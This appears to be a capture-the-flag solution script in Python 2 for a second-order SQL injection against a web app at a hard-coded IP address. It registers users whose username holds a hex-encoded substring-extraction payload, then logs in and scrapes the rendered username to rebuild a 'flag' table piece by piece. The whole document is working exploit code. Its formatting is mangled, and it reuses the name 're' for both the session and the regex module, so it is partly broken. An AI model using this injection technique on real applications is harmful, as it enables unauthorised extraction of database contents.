re = requests.session() url = 'http://159.138.137.79:63582/'
defregister(email,username): url1 = url+'register.php' data = dict(email = email, username = username,password = '123456') html = re.post(url1,data=data) html.encoding = 'utf-8' return html
deflogin(email): url2 = url+'login.php' data = dict(email = email,password = '123456') html = re.post(url2, data=data) html.encoding = 'utf-8' return html
f = '' for j in range(0,17): payload = "0'^(select substr(hex(hex((select * from flag))) from {} for {}))^'0".format(int(j)*10+1,10) email = '{}@qq.com'.format(str(j)+'14') html = register(email,payload)
html = login(email) try: res = r.findall(r'<span class="user-name">(.*?)</span>',html.text,r.S) flag = res[0][1:].strip() f += flag print f.decode('hex').decode('hex') except: print"problem"